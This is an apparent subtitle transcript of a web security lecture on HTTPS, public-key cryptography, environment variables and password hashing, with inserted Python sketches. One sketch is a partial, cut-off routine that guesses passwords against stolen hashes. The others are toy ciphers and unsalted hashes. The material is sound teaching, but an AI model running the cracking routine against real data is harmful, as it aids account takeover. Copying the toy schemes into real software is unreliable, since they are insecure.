344 00:15:20,110 --> 00:15:24,550 So that was HTML being used in order to create potential security 345 00:15:24,550 --> 00:15:26,771 vulnerabilities or security exploits. 346 00:15:26,771 --> 00:15:29,770 Let's take a look now, by moving on one week, and talking about Flask. 347 00:15:29,770 --> 00:15:33,430 So we talked about moving on from just creating static web pages that 348 00:15:33,430 --> 00:15:37,330 are displaying HTML content to using the web server, where we're communicating 349 00:15:37,330 --> 00:15:40,510 between the server and the user, sending packets of information 350 00:15:40,510 --> 00:15:41,440 along the internet. 351 00:15:41,440 --> 00:15:44,148 And as soon as we start dealing with that, packets of information 352 00:15:44,148 --> 00:15:46,850 going from one server to a client, traveling between routers, 353 00:15:46,850 --> 00:15:49,940 now we start to deal with other security concerns as well. 354 00:15:49,940 --> 00:15:53,590 So here, we'll start to talk about HTTP, Hypertext Transfer Protocol, which 355 00:15:53,590 --> 00:15:57,130 is typically used to send packets of information across the internet, 356 00:15:57,130 --> 00:16:00,610 as well as HTTPS, which is a more secure version of that, which 357 00:16:00,610 --> 00:16:03,170 we'll take a look at in just a moment. 358 00:16:03,170 --> 00:16:04,855 So let's imagine this diagram. 359 00:16:04,855 --> 00:16:06,730 I have one computer here, maybe it's a server 360 00:16:06,730 --> 00:16:08,554 running some Flask web application. 361 00:16:08,554 --> 00:16:10,720 And I have a client over here, which is maybe asking 362 00:16:10,720 --> 00:16:12,520 for information from that web server. 363 00:16:12,520 --> 00:16:14,350 In other words, I've got two computers that 364 00:16:14,350 --> 00:16:16,934 need to communicate with each other over the internet somehow. 
365 00:16:16,934 --> 00:16:19,433 And maybe they've never communicated with each other before, 366 00:16:19,433 --> 00:16:21,367 so they need to talk to each other somehow. 367 00:16:21,367 --> 00:16:23,950 And so this computer might want to send packets of information 368 00:16:23,950 --> 00:16:24,887 to the other computer. 369 00:16:24,887 --> 00:16:27,970 But of course, that information doesn't go to the other computer directly. 370 00:16:27,970 --> 00:16:30,010 It needs to travel over the internet, traveling 371 00:16:30,010 --> 00:16:32,770 between different routers and different servers for instance, 372 00:16:32,770 --> 00:16:35,012 before it gets from point A to point B. And likewise, 373 00:16:35,012 --> 00:16:37,720 when information wants to come back from that computer over there 374 00:16:37,720 --> 00:16:40,240 to this computer, we also need to have information 375 00:16:40,240 --> 00:16:42,970 that is traveling through the internet that's potentially going 376 00:16:42,970 --> 00:16:45,190 to all of these routers in between. 377 00:16:45,190 --> 00:16:47,480 And so just looking at this diagram, what's 378 00:16:47,480 --> 00:16:52,343 a security vulnerability that seems clear just from a basic perspective? 379 00:16:52,343 --> 00:16:55,794 380 00:16:55,794 --> 00:16:56,780 Yeah? 381 00:16:56,780 --> 00:17:01,294 AUDIENCE: Changing HTTP header could-- 382 00:17:01,294 --> 00:17:01,960 BRIAN YU: Great. 383 00:17:01,960 --> 00:17:03,200 So changing HTTP headers. 
384 00:17:03,200 --> 00:17:06,760 That's an interesting thought, that if this request is getting passed from-- 385 00:17:06,760 --> 00:17:09,450 a request goes from this computer through all these routers 386 00:17:09,450 --> 00:17:12,510 into this computer, potentially, one of the servers in the middle, 387 00:17:12,510 --> 00:17:16,344 one of these routers, might be able to change that request, for instance, 388 00:17:16,344 --> 00:17:19,260 in order to try and make a request that's slightly different than what 389 00:17:19,260 --> 00:17:20,670 the original user wanted. 390 00:17:20,670 --> 00:17:23,400 Or likewise, because any of these intermediary routers 391 00:17:23,400 --> 00:17:27,089 have access to the full contents of whatever request is being passed 392 00:17:27,089 --> 00:17:30,550 or response is being passed back and forth between these two computers, 393 00:17:30,550 --> 00:17:34,554 anyone in the middle of this process could potentially take that information 394 00:17:34,554 --> 00:17:35,470 and have access to it. 395 00:17:35,470 --> 00:17:37,340 They could read an email that's being sent 396 00:17:37,340 --> 00:17:40,650 or the contents of a web page response that's being sent from one computer 397 00:17:40,650 --> 00:17:43,090 to the other because that packet of information 398 00:17:43,090 --> 00:17:45,610 is just traveling over the internet. 399 00:17:45,610 --> 00:17:47,895 So how do we solve that problem? 400 00:17:47,895 --> 00:17:48,805 Yeah? 401 00:17:48,805 --> 00:17:50,170 AUDIENCE: Encrypt traffic. 402 00:17:50,170 --> 00:17:50,950 BRIAN YU: Encrypt traffic. 403 00:17:50,950 --> 00:17:51,450 Great. 
404 00:17:51,450 --> 00:17:54,490 Cryptography is this idea of encrypting information, of making sure-- 405 00:17:54,490 --> 00:17:56,740 so that we can encrypt our information so it's not 406 00:17:56,740 --> 00:17:59,440 the plain text of the request or the response 407 00:17:59,440 --> 00:18:02,560 that's getting sent over the internet, but rather some ciphertext, 408 00:18:02,560 --> 00:18:06,489 some encrypted version of that plain text, such that someone in the middle 409 00:18:06,489 --> 00:18:07,780 can't just immediately read it. 410 00:18:07,780 --> 00:18:10,360 And there are all sorts of different cryptography algorithms. 411 00:18:10,360 --> 00:18:12,880 And we'll talk high level about a couple of the ideas that 412 00:18:12,880 --> 00:18:14,650 go behind cryptography. 413 00:18:14,650 --> 00:18:17,590 And so one form of cryptography you might hear about 414 00:18:17,590 --> 00:18:20,920 is secret key cryptography, where the idea there 415 00:18:20,920 --> 00:18:24,010 is that we have a secret key that only I know and only 416 00:18:24,010 --> 00:18:27,220 the person at the other computer that I want to communicate with knows. 417 00:18:27,220 --> 00:18:30,790 And that key can be used with my cryptographic algorithm 418 00:18:30,790 --> 00:18:32,500 to encrypt my plain text. 419 00:18:32,500 --> 00:18:37,030 I take my plain text and use my secret key to encrypt it into ciphertext. 420 00:18:37,030 --> 00:18:39,910 Or likewise, I can use the key to decrypt information. 421 00:18:39,910 --> 00:18:43,000 If I have ciphertext, something that's already been encrypted, 422 00:18:43,000 --> 00:18:45,790 I can use that key along with the ciphertext 423 00:18:45,790 --> 00:18:47,800 in order to generate plain text. 424 00:18:47,800 --> 00:18:50,860 And so you might imagine a diagram where I have one computer over here 425 00:18:50,860 --> 00:18:53,260 and I'm trying to communicate with a computer down there. 
426 00:18:53,260 --> 00:18:57,750 I have this secret key, this ability to encrypt and decrypt information, 427 00:18:57,750 --> 00:19:00,250 and I also have the plain text of what it is that I actually 428 00:19:00,250 --> 00:19:05,470 want to encrypt, the message that I want to send from one place to the other. 429 00:19:05,470 --> 00:19:07,060 And so what might reasonably happen? 430 00:19:07,060 --> 00:19:10,030 What I do in secret key cryptography is first 431 00:19:10,030 --> 00:19:13,330 use the key to encrypt the plain text, generating 432 00:19:13,330 --> 00:19:16,090 some ciphertext, some encrypted version of the plain text 433 00:19:16,090 --> 00:19:19,300 that someone without the key wouldn't be able to understand. 434 00:19:19,300 --> 00:19:22,880 So then I would need to transfer the ciphertext to this computer. 435 00:19:22,880 --> 00:19:26,110 And if this computer has both the ciphertext and a copy of that same 436 00:19:26,110 --> 00:19:30,490 secret key, then they can use that key in order to decrypt that ciphertext 437 00:19:30,490 --> 00:19:34,000 and regenerate the plain text-- find out what it is that I actually intended 438 00:19:34,000 --> 00:19:34,810 to happen-- 439 00:19:34,810 --> 00:19:39,220 such that now, the plain text was never transferred from one computer 440 00:19:39,220 --> 00:19:40,060 to the other. 441 00:19:40,060 --> 00:19:42,850 I was only ever transferring the ciphertext 442 00:19:42,850 --> 00:19:45,520 from one computer to the other. 443 00:19:45,520 --> 00:19:48,381 Does anyone see a problem with what we just did there? 444 00:19:48,381 --> 00:19:50,380 It seems like no plain text is ever transferred. 445 00:19:50,380 --> 00:19:50,910 What could go wrong? 446 00:19:50,910 --> 00:19:51,342 Yeah? 447 00:19:51,342 --> 00:19:52,640 AUDIENCE: How do you send the key? 448 00:19:52,640 --> 00:19:52,930 BRIAN YU: Great. 449 00:19:52,930 --> 00:19:54,070 How do you send the key? 
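The secret key scheme described above, where one shared key both encrypts and decrypts, can be sketched roughly as follows. This is only a toy illustration: the XOR step stands in for a real cipher, and the names `xor_bytes`, `shared_key`, `plaintext`, `ciphertext`, and `recovered` are hypothetical and do not come from the lecture.

```python
import secrets


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the matching byte of key (toy cipher)."""
    if len(key) < len(data):
        raise ValueError("key must be at least as long as the data")
    return bytes(d ^ k for d, k in zip(data, key))


plaintext = b"hello, server"

# Assumption: both computers somehow already hold this same random key.
shared_key = secrets.token_bytes(len(plaintext))

# Sender: plain text + key -> ciphertext (this is what travels the network).
ciphertext = xor_bytes(plaintext, shared_key)

# Receiver: ciphertext + the same key -> plain text again.
recovered = xor_bytes(ciphertext, shared_key)
```

Only `ciphertext` crosses the network in this sketch, but the sketch says nothing about how `shared_key` reached the other computer, which is exactly the open question here.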
450 00:19:54,070 --> 00:19:58,270 That somehow, I need to have this key and the person over here 451 00:19:58,270 --> 00:20:00,160 also needs to have that key. 452 00:20:00,160 --> 00:20:03,252 And if I'm just sending the key over the internet from one computer 453 00:20:03,252 --> 00:20:04,960 to the other, which I would theoretically 454 00:20:04,960 --> 00:20:06,880 need to do because otherwise I have no way of communicating 455 00:20:06,880 --> 00:20:10,160 with the other computer, then we've just created the same problem again. 456 00:20:10,160 --> 00:20:13,240 That any of these routers, these intermediary pieces, 457 00:20:13,240 --> 00:20:16,780 over the course of this communication from computer A to computer B, 458 00:20:16,780 --> 00:20:20,176 could just intercept the key and intercept the ciphertext. 459 00:20:20,176 --> 00:20:22,300 And now they have all the pieces they need in order 460 00:20:22,300 --> 00:20:24,620 to regenerate the plain text. 461 00:20:24,620 --> 00:20:28,300 So this secret key cryptography works if and only 462 00:20:28,300 --> 00:20:31,630 if only I and only the other person have access to the key. 463 00:20:31,630 --> 00:20:35,440 And it doesn't work so well if this key is something 464 00:20:35,440 --> 00:20:39,160 that needs to be transferred plainly over the network in order 465 00:20:39,160 --> 00:20:42,740 to get to the other person, because then anyone could just intercept that key. 466 00:20:42,740 --> 00:20:44,269 And so how do we solve that problem? 467 00:20:44,269 --> 00:20:46,060 Well, one solution people have come up with 468 00:20:46,060 --> 00:20:48,410 is this idea of public key cryptography. 469 00:20:48,410 --> 00:20:50,830 And this is very common, and it's what HTTPS 470 00:20:50,830 --> 00:20:54,850 uses in order to securely transfer information over the internet. 471 00:20:54,850 --> 00:20:59,170 And the idea there is instead of having just one key, we have two keys. 
472 00:20:59,170 --> 00:21:01,690 We have a public key and a private key. 473 00:21:01,690 --> 00:21:03,940 And these are related in a particularly important way, 474 00:21:03,940 --> 00:21:06,740 and the details have to do with a lot of mathematics. 475 00:21:06,740 --> 00:21:10,750 But the general idea is that the public key is something 476 00:21:10,750 --> 00:21:12,920 that you should be able to share with anyone, 477 00:21:12,920 --> 00:21:16,500 and the public key can only be used to encrypt information. 478 00:21:16,500 --> 00:21:18,940 It will take plain text and it'll generate 479 00:21:18,940 --> 00:21:20,752 the ciphertext, the encrypted version. 480 00:21:20,752 --> 00:21:22,460 But it doesn't go in the other direction. 481 00:21:22,460 --> 00:21:24,880 It can only be used to encrypt data. 482 00:21:24,880 --> 00:21:27,409 And likewise, the private key is something 483 00:21:27,409 --> 00:21:29,200 that you should only ever keep to yourself. 484 00:21:29,200 --> 00:21:31,660 You should never share your private key with anyone else. 485 00:21:31,660 --> 00:21:34,360 And the private key can be used to decrypt data. 486 00:21:34,360 --> 00:21:36,550 That if I have encrypted information that 487 00:21:36,550 --> 00:21:40,090 was encrypted using the public key, I can use the private key 488 00:21:40,090 --> 00:21:42,271 in order to decrypt it. 489 00:21:42,271 --> 00:21:44,020 So what does that model look like if I now 490 00:21:44,020 --> 00:21:46,720 have two computers that want to communicate with each other? 491 00:21:46,720 --> 00:21:48,670 I still have this computer over here that 492 00:21:48,670 --> 00:21:51,680 wants to send this plain text over to this computer, 493 00:21:51,680 --> 00:21:53,560 but wants to do so securely. 
494 00:21:53,560 --> 00:21:55,630 So the first thing that's going to need to happen 495 00:21:55,630 --> 00:21:58,330 is that this computer, computer B down here, 496 00:21:58,330 --> 00:22:01,654 gives its public key to computer A. And that's 497 00:22:01,654 --> 00:22:04,570 OK because the public key is something that can be shared with anyone. 498 00:22:04,570 --> 00:22:07,150 Anyone's allowed to see it because the public key can only 499 00:22:07,150 --> 00:22:08,590 be used to encrypt data. 500 00:22:08,590 --> 00:22:11,060 It can't be used to decrypt data. 501 00:22:11,060 --> 00:22:14,920 And so now computer A, having access to the plain text and the public key, 502 00:22:14,920 --> 00:22:19,010 now has the ability to encrypt the plain text, generating the ciphertext. 503 00:22:19,010 --> 00:22:22,420 That ciphertext then gets transferred down to the other computer. 504 00:22:22,420 --> 00:22:26,140 And now computer B has both the ciphertext, this encrypted information 505 00:22:26,140 --> 00:22:29,350 that nobody along this path was able to read or see, 506 00:22:29,350 --> 00:22:33,130 and also has access to this private key that only they had access to. 507 00:22:33,130 --> 00:22:37,210 And that is the only thing that can be used in order to take the ciphertext 508 00:22:37,210 --> 00:22:40,700 and decrypt it and figure out what it is that the message actually is. 509 00:22:40,700 --> 00:22:44,940 And now computer B has the ability to regenerate the plain text from it. 
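The public and private key exchange just described can be sketched with textbook RSA on deliberately tiny numbers. This is an illustration under stated assumptions, not how HTTPS is actually implemented: real systems use very large keys, padding, and vetted libraries, and the names `encrypt`, `decrypt`, `public_key`, and `private_key` are hypothetical.

```python
# Toy RSA key generation on computer B (tiny primes, for illustration only).
p, q = 61, 53
n = p * q                      # modulus shared by both keys
phi = (p - 1) * (q - 1)
e = 17                         # public exponent
d = pow(e, -1, phi)            # private exponent (needs Python 3.8+)

public_key = (e, n)            # safe to hand to anyone, including computer A
private_key = (d, n)           # never leaves computer B


def encrypt(message: int, key: tuple) -> int:
    """Encrypt a small integer message with the public key."""
    exponent, modulus = key
    return pow(message, exponent, modulus)


def decrypt(cipher: int, key: tuple) -> int:
    """Decrypt a ciphertext with the private key."""
    exponent, modulus = key
    return pow(cipher, exponent, modulus)


message = 65                                   # stand-in for the plain text
ciphertext = encrypt(message, public_key)      # done on computer A
recovered = decrypt(ciphertext, private_key)   # done on computer B
```

An intermediary who sees `public_key` and `ciphertext` still lacks `d`, which is the point of the scheme; with numbers this small it could be recovered by factoring `n`, which is why real keys are far larger.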
510 00:22:44,940 --> 00:22:48,575 And so now we've been able to come up with a secure way of allowing computer 511 00:22:48,575 --> 00:22:51,380 A and computer B to communicate with each other, 512 00:22:51,380 --> 00:22:55,341 just by allowing them to use this public and private key pairing such 513 00:22:55,341 --> 00:22:57,590 that the public key is used to encrypt the information 514 00:22:57,590 --> 00:22:59,990 and is shared with everyone, and the private key is only 515 00:22:59,990 --> 00:23:01,820 used for decrypting the information. 516 00:23:01,820 --> 00:23:03,470 And it doesn't matter if the intermediaries have 517 00:23:03,470 --> 00:23:05,844 the public key because that just means other people might 518 00:23:05,844 --> 00:23:09,470 be able to encrypt the data, but not necessarily be 519 00:23:09,470 --> 00:23:11,992 able to decrypt that information. 520 00:23:11,992 --> 00:23:14,700 Questions about that or any problems that we see with that model? 521 00:23:14,700 --> 00:23:19,140 522 00:23:19,140 --> 00:23:20,040 OK. 523 00:23:20,040 --> 00:23:23,520 In that case, we'll go ahead and move on to talking 524 00:23:23,520 --> 00:23:27,501 about our next subject, which is going to be environment variables. 525 00:23:27,501 --> 00:23:29,250 And so environment variables are something 526 00:23:29,250 --> 00:23:32,771 we've seen a little bit of in Flask before, and probably in Django as well. 527 00:23:32,771 --> 00:23:34,770 But we'll talk about it in the context of trying 528 00:23:34,770 --> 00:23:36,730 to make our applications more secure. 529 00:23:36,730 --> 00:23:38,730 So we talked about, in the context of Git 530 00:23:38,730 --> 00:23:41,700 earlier, that we rarely, or probably never, 531 00:23:41,700 --> 00:23:45,027 want to put passwords or other secure, confidential information 532 00:23:45,027 --> 00:23:46,110 inside of our source code. 
533 00:23:46,110 --> 00:23:50,530 Because as soon as we push a password or an access token to a GitHub repository, 534 00:23:50,530 --> 00:23:52,957 now suddenly anyone who has had access to that repository 535 00:23:52,957 --> 00:23:54,540 could theoretically be able to see it. 536 00:23:54,540 --> 00:23:57,660 Or if someone gets access to your GitHub account by some means or another, 537 00:23:57,660 --> 00:24:00,660 they would also be able to see that password or access token. 538 00:24:00,660 --> 00:24:03,930 Maybe that's going to be an access token that is the access token for getting 539 00:24:03,930 --> 00:24:05,880 access to your database, for instance. 540 00:24:05,880 --> 00:24:08,170 Or it's your access token for whatever cloud 541 00:24:08,170 --> 00:24:10,170 provider you're using, like Amazon Web Services, 542 00:24:10,170 --> 00:24:13,050 in order to deploy your application to the internet. 543 00:24:13,050 --> 00:24:16,830 So rather than doing something like this, where if you've used 544 00:24:16,830 --> 00:24:19,350 Flask before and have used their cookie-based sessions, 545 00:24:19,350 --> 00:24:21,825 you need to set a secret key inside of your application 546 00:24:21,825 --> 00:24:23,700 where you might have set a secret key to just 547 00:24:23,700 --> 00:24:28,020 be some random string of characters, which is totally fine from just running 548 00:24:28,020 --> 00:24:29,040 the application. 549 00:24:29,040 --> 00:24:31,230 This isn't all that secure because as soon 550 00:24:31,230 --> 00:24:34,140 as you push this file to the internet, now anyone 551 00:24:34,140 --> 00:24:36,360 who has access to your repository theoretically 552 00:24:36,360 --> 00:24:38,339 has access to your secret key as well. 
553 00:24:38,339 --> 00:24:41,130 And so these are often times where we would want to use environment 554 00:24:41,130 --> 00:24:44,920 variables, using variables that are located just inside of the system 555 00:24:44,920 --> 00:24:48,270 on the computer where your program is running such that we can replace 556 00:24:48,270 --> 00:24:52,690 the key with os.environ.get("SECRET_KEY"). 557 00:24:52,690 --> 00:24:55,650 In other words, get the environment variable called secret key 558 00:24:55,650 --> 00:24:58,830 and use it as a secret key so that inside your code, now 559 00:24:58,830 --> 00:24:59,910 it just says this. 560 00:24:59,910 --> 00:25:03,750 So nobody who reads your code knows what the secret key for your application is, 561 00:25:03,750 --> 00:25:08,070 but only the computer on which this program is running that, theoretically, 562 00:25:08,070 --> 00:25:11,200 has that secret key set as one of its environment variables 563 00:25:11,200 --> 00:25:12,540 will then be able to use it. 564 00:25:12,540 --> 00:25:14,560 And so environment variables in that sense 565 00:25:14,560 --> 00:25:17,460 can be a very valuable tool when it comes 566 00:25:17,460 --> 00:25:20,460 to trying to make sure that we're not exposing information 567 00:25:20,460 --> 00:25:25,320 that we didn't want to expose when we were creating our application. 568 00:25:25,320 --> 00:25:29,580 Questions about environment variables? 569 00:25:29,580 --> 00:25:30,330 All right. 570 00:25:30,330 --> 00:25:31,530 So that was Flask. 571 00:25:31,530 --> 00:25:34,710 And let's go ahead now and move on to talking about SQL. 572 00:25:34,710 --> 00:25:37,020 So we talked a lot about databases and how 573 00:25:37,020 --> 00:25:39,150 we might go about designing databases. 
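Returning briefly to the environment variable idea from the Flask discussion, a minimal sketch might look like the following. The helper name `load_secret_key` is hypothetical, and failing loudly when the variable is missing is an assumption of this sketch rather than something the lecture prescribes.

```python
import os


def load_secret_key(env=os.environ) -> str:
    """Read SECRET_KEY from the environment instead of hard-coding it."""
    key = env.get("SECRET_KEY")
    if not key:
        # Refuse to start rather than fall back to a guessable default.
        raise RuntimeError("SECRET_KEY environment variable is not set")
    return key


# In a Flask application this would typically be used along these lines:
#   app.secret_key = load_secret_key()
```

The value itself would be set on the machine that runs the program, for example with `export SECRET_KEY=...` in the shell, so it never appears in the repository.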
574 00:25:39,150 --> 00:25:41,220 And in a couple of our projects now, we've 575 00:25:41,220 --> 00:25:45,000 had to create a table that is able to manage a database of users, where 576 00:25:45,000 --> 00:25:47,040 users are able to log in and log out. 577 00:25:47,040 --> 00:25:50,730 And in order to do that, we needed some sort of database structure in place 578 00:25:50,730 --> 00:25:54,369 such that users were able to be remembered by our system such 579 00:25:54,369 --> 00:25:56,910 that they could log in such that they had passwords and such. 580 00:25:56,910 --> 00:25:59,743 And you might imagine that a users table might have looked something 581 00:25:59,743 --> 00:26:03,510 like this, where each user has an ID, each user has a user name, 582 00:26:03,510 --> 00:26:06,010 each user has a password. 583 00:26:06,010 --> 00:26:09,855 What are potential design problems or security vulnerabilities 584 00:26:09,855 --> 00:26:11,480 with a table that's designed like this? 585 00:26:11,480 --> 00:26:14,290 586 00:26:14,290 --> 00:26:15,512 Yep? 587 00:26:15,512 --> 00:26:18,278 AUDIENCE: If someone gets their hands on the database, 588 00:26:18,278 --> 00:26:19,670 they can see all the passwords. 589 00:26:19,670 --> 00:26:19,970 BRIAN YU: Yeah. 590 00:26:19,970 --> 00:26:22,160 So obviously, we want to keep our tables secure. 591 00:26:22,160 --> 00:26:24,701 We don't want to let just anyone have access to our database. 592 00:26:24,701 --> 00:26:27,230 But if by some chance, someone got access to our database, 593 00:26:27,230 --> 00:26:30,380 either because they managed to figure out what the password is 594 00:26:30,380 --> 00:26:32,720 or they got access to it in some other way, now 595 00:26:32,720 --> 00:26:37,370 suddenly they have access to all of the different passwords that 596 00:26:37,370 --> 00:26:38,904 are inside of this database.
597 00:26:38,904 --> 00:26:40,820 They know what everyone's password is, and now 598 00:26:40,820 --> 00:26:42,620 that's a major security vulnerability. 599 00:26:42,620 --> 00:26:45,710 Especially if some of these users might be using these same passwords 600 00:26:45,710 --> 00:26:48,980 not only on one website, but on many other different websites. 601 00:26:48,980 --> 00:26:52,850 Now their password could be compromised across a number of different websites 602 00:26:52,850 --> 00:26:53,790 as well. 603 00:26:53,790 --> 00:26:58,017 And so what might be a solution here to avoiding needing to store the password 604 00:26:58,017 --> 00:26:58,850 inside of the table? 605 00:26:58,850 --> 00:27:00,470 And this might be something that you've already 606 00:27:00,470 --> 00:27:02,094 done in some of your existing projects. 607 00:27:02,094 --> 00:27:04,940 608 00:27:04,940 --> 00:27:06,405 AUDIENCE: Encrypt the passwords. 609 00:27:06,405 --> 00:27:07,030 BRIAN YU: Yeah. 610 00:27:07,030 --> 00:27:08,230 Encrypt the password. 611 00:27:08,230 --> 00:27:11,350 In other words, don't just store the plain text of the password, 612 00:27:11,350 --> 00:27:13,310 store some version of the password. 613 00:27:13,310 --> 00:27:15,310 And in particular, we'll generally store what we 614 00:27:15,310 --> 00:27:17,530 call a hashed version of the password. 615 00:27:17,530 --> 00:27:21,490 Where a hash function is just going to be some function inside of your code 616 00:27:21,490 --> 00:27:25,240 that takes text like a password and generates, 617 00:27:25,240 --> 00:27:29,350 deterministically, some long sequence of characters that's seemingly random that 618 00:27:29,350 --> 00:27:31,750 is associated with that text. 619 00:27:31,750 --> 00:27:35,620 And so every time you put hello in as the password and hash it, 620 00:27:35,620 --> 00:27:38,050 you'll always deterministically get the same output. 
621 00:27:38,050 --> 00:27:40,550 And so then your users table might look something like this. 622 00:27:40,550 --> 00:27:43,420 Where you've got all of your users, but in your password column, 623 00:27:43,420 --> 00:27:46,150 instead of storing the actual password in plain text, 624 00:27:46,150 --> 00:27:49,090 you're storing some hashed version of that password. 625 00:27:49,090 --> 00:27:52,810 Such that hello generates this text as the password 626 00:27:52,810 --> 00:27:54,910 instead of just storing hello. 627 00:27:54,910 --> 00:27:58,900 So now if someone gets access to this database, 628 00:27:58,900 --> 00:28:01,650 they're still not going to be able to log into Anushree's account, 629 00:28:01,650 --> 00:28:04,108 for instance, if they go to the website because they're not 630 00:28:04,108 --> 00:28:08,950 going to know what password corresponded with this long sequence of characters. 631 00:28:08,950 --> 00:28:13,000 And generally, hash functions are designed to be one-way functions. 632 00:28:13,000 --> 00:28:16,870 That you can go from the plain text, the password, to this hashed version. 633 00:28:16,870 --> 00:28:19,540 But it's very, very computationally difficult to go backwards, 634 00:28:19,540 --> 00:28:22,450 to go from this hashed version to what the password originally 635 00:28:22,450 --> 00:28:24,880 was in order to generate this. 636 00:28:24,880 --> 00:28:29,300 And so what are the security implications of this model? 637 00:28:29,300 --> 00:28:30,880 How do we now log in a user, now? 638 00:28:30,880 --> 00:28:31,509 In this model. 639 00:28:31,509 --> 00:28:33,550 If someone were to log into a website, what logic 640 00:28:33,550 --> 00:28:35,508 would need to happen if we're no longer storing 641 00:28:35,508 --> 00:28:37,732 passwords but storing hashed passwords? 642 00:28:37,732 --> 00:28:38,232 Yeah? 
643 00:28:38,232 --> 00:28:38,728 AUDIENCE: They could take the password they 644 00:28:38,728 --> 00:28:40,519 enter, you run through your hash algorithm, 645 00:28:40,519 --> 00:28:42,436 and you see if it matches what's in your file. 646 00:28:42,436 --> 00:28:43,269 BRIAN YU: Wonderful. 647 00:28:43,269 --> 00:28:45,220 User logs in with their username and password. 648 00:28:45,220 --> 00:28:47,710 You take that password and you hash it, and you check 649 00:28:47,710 --> 00:28:49,520 to make sure that the hash matches up. 650 00:28:49,520 --> 00:28:51,478 And because our hash function is deterministic, 651 00:28:51,478 --> 00:28:54,790 the same input will output the same output every single time. 652 00:28:54,790 --> 00:28:57,250 If they did input the correct password, then the hashes 653 00:28:57,250 --> 00:28:59,920 should theoretically line up. 654 00:28:59,920 --> 00:29:02,020 Have you ever used a website before where, 655 00:29:02,020 --> 00:29:04,562 when you forget a password, your password, 656 00:29:04,562 --> 00:29:06,520 and you might want the website to just tell you 657 00:29:06,520 --> 00:29:08,965 what your password is, but the website says, sorry, 658 00:29:08,965 --> 00:29:12,940 we can't tell you what your password is, but we can let you reset your password. 659 00:29:12,940 --> 00:29:14,900 With this in mind, why might that be the case? 660 00:29:14,900 --> 00:29:18,472 Why can a website sometimes not tell you what your password 661 00:29:18,472 --> 00:29:19,930 is but still allow you to reset it? 662 00:29:19,930 --> 00:29:23,425 Or still be able to log you in if you knew your password? 663 00:29:23,425 --> 00:29:25,800 AUDIENCE: Because they're not storing it in text anymore. 664 00:29:25,800 --> 00:29:27,339 So we don't know-- 665 00:29:27,339 --> 00:29:28,380 BRIAN YU: Great, exactly. 666 00:29:28,380 --> 00:29:30,671 It's because of this idea of the one-way hash function.
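The hash-and-compare login logic described above might be sketched like this. Plain SHA-256 is used here only because it is deterministic in the way the lecture describes; production systems generally prefer a dedicated, salted password hashing function. The `users` dictionary and the function names are hypothetical stand-ins for a real users table.

```python
import hashlib
import hmac


def hash_password(password: str) -> str:
    """Deterministically map a password to a 64-character hex digest."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


# Hypothetical users table: username -> stored hash, never the plain text.
users = {"anushree": hash_password("hello")}


def check_login(username: str, password: str) -> bool:
    """Hash the submitted password and compare it with the stored hash."""
    stored = users.get(username)
    if stored is None:
        return False
    # Constant-time comparison of the two hex digests.
    return hmac.compare_digest(stored, hash_password(password))
```

Note that nothing in `users` lets the site recover the original password; it can only check a guess or overwrite the stored hash, which is why a reset is possible but a reminder is not.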
667 00:29:30,671 --> 00:29:33,770 That if you take the password, you can generate this hashed version. 668 00:29:33,770 --> 00:29:35,894 But it's very difficult to go the other way around. 669 00:29:35,894 --> 00:29:39,851 Such that, if this is what I have access to in my database, I can look at this, 670 00:29:39,851 --> 00:29:42,350 and I don't actually know what Anushree's or Elle's password 671 00:29:42,350 --> 00:29:43,304 originally was. 672 00:29:43,304 --> 00:29:46,470 But if you give me their password, then I can hash it and compare it for you 673 00:29:46,470 --> 00:29:49,350 and maybe be able to tell you that as a result. 674 00:29:49,350 --> 00:29:51,650 But I could reset it if I wanted to just by replacing 675 00:29:51,650 --> 00:29:53,517 this field with some new hashed value. 676 00:29:53,517 --> 00:29:55,850 That would be something that I could do, but I might not 677 00:29:55,850 --> 00:29:58,144 be able to actually tell you what that password is. 678 00:29:58,144 --> 00:30:00,560 Of course, if these passwords are common, like these are-- 679 00:30:00,560 --> 00:30:03,800 if they're just passwords hello or password or 12345-- 680 00:30:03,800 --> 00:30:06,710 then how might I still be able to figure out a user's password 681 00:30:06,710 --> 00:30:10,870 even if the database looks like this? 682 00:30:10,870 --> 00:30:11,574 Yeah? 683 00:30:11,574 --> 00:30:13,912 AUDIENCE: You hash it and compare the hashes or if you 684 00:30:13,912 --> 00:30:15,370 can look for common hashes and see. 685 00:30:15,370 --> 00:30:16,310 BRIAN YU: Exactly. 
686 00:30:16,310 --> 00:30:20,360 If you know what the hash function is, then someone trying to-- 687 00:30:20,360 --> 00:30:22,640 a malicious user trying to exploit the system 688 00:30:22,640 --> 00:30:26,180 might be able to just try a whole bunch of different common passwords, 689 00:30:26,180 --> 00:30:27,950 figure out what their hashed versions are, 690 00:30:27,950 --> 00:30:31,146 and then compare it to the versions that are here in order to figure out 691 00:30:31,146 --> 00:30:32,270 what the password might be. 692 00:30:32,270 --> 00:30:34,490 So even this is not 100% foolproof. 693 00:30:34,490 --> 00:30:36,710 Someone who is trying a bunch of common passwords 694 00:30:36,710 --> 00:30:39,117 might still be able to figure out what it is 695 00:30:39,117 --> 00:30:40,700 that's going on inside of this system. 696 00:30:40,700 --> 00:30:42,950 And so that's certainly one vulnerability 697 00:30:42,950 --> 00:30:46,360 that could come up when we think about database design. 698 00:30:46,360 --> 00:30:48,110 But another vulnerability, and this is one 699 00:30:48,110 --> 00:30:50,235 we talked about a little bit a couple of weeks ago, 700 00:30:50,235 --> 00:30:52,610 but we'll dive into in a little more depth now-- 701 00:30:52,610 --> 00:30:54,797 well, actually, first, before we get there, sorry. 702 00:30:54,797 --> 00:30:56,630 So this was that Forgot Your Password screen 703 00:30:56,630 --> 00:30:58,838 that we were talking a little bit about before, where 704 00:30:58,838 --> 00:31:02,529 oftentimes what might happen is you'll type in an email address, for instance, 705 00:31:02,529 --> 00:31:04,070 and you'll click Reset Your Password. 706 00:31:04,070 --> 00:31:05,986 And that will send you an email that gives you 707 00:31:05,986 --> 00:31:08,610 the ability to reset your password.
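The common-password attack described a moment ago, hashing likely guesses and comparing them against a leaked table, can be sketched as follows. The function names and the sample data are hypothetical, and unsalted SHA-256 is assumed as the hash function purely for illustration.

```python
import hashlib


def sha256_hex(text: str) -> str:
    """Hash a candidate password the same way the site is assumed to."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def guess_passwords(stolen_hashes: dict, candidates: list) -> dict:
    """Return username -> password for every hash that matches a guess."""
    # Precompute hash -> password for the list of common passwords.
    lookup = {sha256_hex(password): password for password in candidates}
    return {
        user: lookup[digest]
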